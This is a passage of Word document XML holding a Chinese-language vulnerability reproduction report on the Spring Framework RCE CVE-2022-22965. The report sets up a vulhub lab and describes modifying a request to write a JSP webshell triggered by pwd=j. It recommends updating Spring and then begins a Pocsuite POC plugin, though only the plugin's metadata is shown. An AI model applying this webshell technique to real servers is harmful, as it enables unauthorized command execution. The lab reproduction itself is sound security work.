          </w:tcPr>
          <w:p w14:paraId="5ED8CDA4" w14:textId="084C4A4F" w:rsidR="008F6264" w:rsidRDefault="009320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376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E55EEE2" w14:textId="07292F08" w:rsidR="008F6264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利用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ulhub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中的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环境，搭建</w:t>
            </w:r>
            <w:r w:rsidR="00932005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="00932005"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 w:rsidR="00932005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环境，访问目标端口。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="0C09A0C2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="604D3387" w14:textId="1743CE0C" w:rsidR="008F6264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376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D1E8118" w14:textId="2678901E" w:rsidR="003D1839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.</w:t>
            </w:r>
            <w:r w:rsidR="007B2A88" w:rsidRPr="007B2A88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进行抓包，使用复现代码修改请求</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CBEBA9C" w14:textId="11A30BAD" w:rsidR="008F6264" w:rsidRPr="003D1839" w:rsidRDefault="003D1839" w:rsidP="007B2A8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lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="007B2A88" w:rsidRPr="007B2A88">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>访问写入的程序时，将</w:t>
            </w:r>
            <w:r w:rsidR="007B2A88" w:rsidRPr="007B2A88">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>pwd</w:t>
            </w:r>
            <w:r w:rsidR="007B2A88" w:rsidRPr="007B2A88">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>参数设置为</w:t>
            </w:r>
            <w:r w:rsidR="007B2A88" w:rsidRPr="007B2A88">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>j</w:t>
            </w:r>
            <w:r w:rsidR="007B2A88" w:rsidRPr="007B2A88">
              <w:rPr>
                <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>，就可以执行目标命令，输出回显（还会有一些无关输出）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="2BAB16D6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6091AB27" w14:textId="3C3F0FCA" w:rsidR="008F6264" w:rsidRDefault="00853D6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修复建议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F5FDCEC" w14:textId="0086E543" w:rsidR="008F6264" w:rsidRDefault="00853D6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更新</w:t>
            </w:r>
            <w:r w:rsidR="007B2A88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版本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即可。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F6D79FB" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc1860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8F6264" w14:paraId="481A923E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65ED69FF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60085757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3B0BA08A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8F6264" w14:paraId="0918A6FA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3E6932A2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64C85015" w14:textId="3867DF3E" w:rsidR="008F6264" w:rsidRDefault="00890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73B530A9" w14:textId="18535431" w:rsidR="008F6264" w:rsidRDefault="00B715C4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24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可以</w:t>
            </w:r>
            <w:r w:rsidR="00E307CA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="4D4D4D"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>执行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任意</w:t>
            </w:r>
            <w:r w:rsidR="00E307CA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
                <w:color w:val="4D4D4D"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="408ABBB9" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="25507C47" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="23" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="24" w:name="_Toc613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0822C200" w14:textId="63B0226D" w:rsidR="005E7177" w:rsidRDefault="00733DD9" w:rsidP="005E7177">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005E7177" w:rsidRPr="005E7177">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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首先使用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vulhub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靶场搭建环境，</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>访问目标端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC91761" w14:textId="5001A10B" w:rsidR="00733DD9" w:rsidRDefault="00B715C4" w:rsidP="005E7177">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:firstLineChars="200" w:firstLine="48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98C000E" wp14:editId="6AB0B930">
            <wp:extent cx="5274310" cy="586740"/>
            <wp:effectExtent l="0" t="0" r="254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-1181" r="4905" b="1181"/>
                    <a:stretch/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FB6" w14:textId="0EA862FA" w:rsidR="00E66185" w:rsidRDefault="00E66185" w:rsidP="00E66185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Pr="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B715C4" w:rsidRPr="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之后进行抓包，使用复现代码修改请求</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A2399C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用了构造参数的方式绕过脚本的检查，</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使得</w:t>
      </w:r>
      <w:r w:rsidR="001C0303" w:rsidRPr="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解析以后会出现形成一个</w:t>
      </w:r>
      <w:r w:rsidR="001C0303" w:rsidRPr="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JSP webshell</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="001C0303" w:rsidRPr="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态</w:t>
      </w:r>
      <w:r w:rsidR="001C0303" w:rsidRPr="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="001C0303" w:rsidRPr="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，判断</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否为</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以运行后面的</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:r w:rsidR="00B33E40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如果是则会执行目标命令</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6BD4C8" w14:textId="011D9C32" w:rsidR="00E66185" w:rsidRDefault="00B715C4" w:rsidP="00E66185">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/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67FDD984" wp14:editId="72925C38">
            <wp:extent cx="5274310" cy="2261870"/>
            <wp:effectExtent l="0" t="0" r="254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17088" b="331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3EF" w14:textId="26FE65BE" w:rsidR="00E66185" w:rsidRPr="00E66185" w:rsidRDefault="00E66185" w:rsidP="00B715C4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.</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4" w:rsidRPr="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问写入的程序时，将</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4" w:rsidRPr="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4" w:rsidRPr="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数设置为</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4" w:rsidRPr="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4" w:rsidRPr="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，就可以执行目标命令，输出回显（还会</w:t>
      </w:r>
      <w:r w:rsidR="001C0303">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>显示脚本</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4" w:rsidRPr="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38490639" w14:textId="060A351A" w:rsidR="008F6264" w:rsidRPr="00B715C4" w:rsidRDefault="00B715C4" w:rsidP="00B715C4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="48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3D83063" wp14:editId="7ED9D696">
            <wp:extent cx="5274310" cy="84709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8715" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="31CB0A52" w14:textId="62618192" w:rsidR="008F6264" w:rsidRPr="00E66185" w:rsidRDefault="00AA5F05">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sp</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4">
        <w:t>ring Framework</w:t>
      </w:r>
      <w:r w:rsidR="00B715C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r w:rsidR="00E66185">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5557AF86" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="27" w:name="_Toc10352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1FF58950" w14:textId="7EAA0303" w:rsidR="008F6264" w:rsidRPr="00D90C5E" w:rsidRDefault="00D90C5E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00D90C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t>vulhub</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t>提供的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t>cker</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t>环境</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，复现后编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>oc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A18F8A" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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28445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5E3E674C" w14:textId="46D27228" w:rsidR="00382B24" w:rsidRDefault="00D90C5E">
      <w:r w:rsidRPr="00D90C5E">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ock</w:t>
      </w:r>
      <w:r w:rsidRPr="00D90C5E">
        <w:t xml:space="preserve">er desktop </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1242E6BC" w14:textId="5A65349C" w:rsidR="00382B24" w:rsidRDefault="00D90C5E">
      <w:r w:rsidRPr="00D90C5E">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:r w:rsidR="00382B24">
        <w:t xml:space="preserve"> pro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360C73EE" w14:textId="551B57D5" w:rsidR="008F6264" w:rsidRPr="00D90C5E" w:rsidRDefault="00382B24">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">csuite </w:t>
      </w:r>
      <w:r w:rsidR="00535F24">
        <w:t>2.0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C8404A" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05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1B570DA8" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1 POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="6658EFC7" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>#!/usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF38FEA" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t># coding: utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4F00E" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DA203A" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>from pocsuite.api.request import req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4613346D" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>from pocsuite.api.poc import register,Output, POCBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF0DE4" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>from pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4754CAEE" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF9E3E8" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:lastRenderedPageBreak/>
        <w:t>class TestPOC(POCBase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA8EDC8" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    vulID = '''CVE-2022-22965'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6FBD5" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    cveID = '''CVE-2022-22965'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7DCB1" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    cnvdID = '''CNVD-2022-23942'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A42A1" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    cnnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AAC32C" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    version = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0E6106" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    author = '''</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>郝志成</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAD0E8D" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    vulDate = '''2022-03-30'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60141C4D" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    createDate = '''2022-03-30'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E9115" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    updateDate = '''2022-03-30'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E60CE09" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    name = '''Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>远程代码执行漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD0F68" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>    desc = '''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD4BDFB" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>通过该漏洞可写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>以及命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F891EAD" w14:textId="77777777" w:rsidR="00823670" w:rsidRPr="00823670" w:rsidRDefault="00823670" w:rsidP="00823670">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00823670">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
        <w:t>框架的</w:t>
      </w:r>
      <w:r w:rsidRPr="00823670">
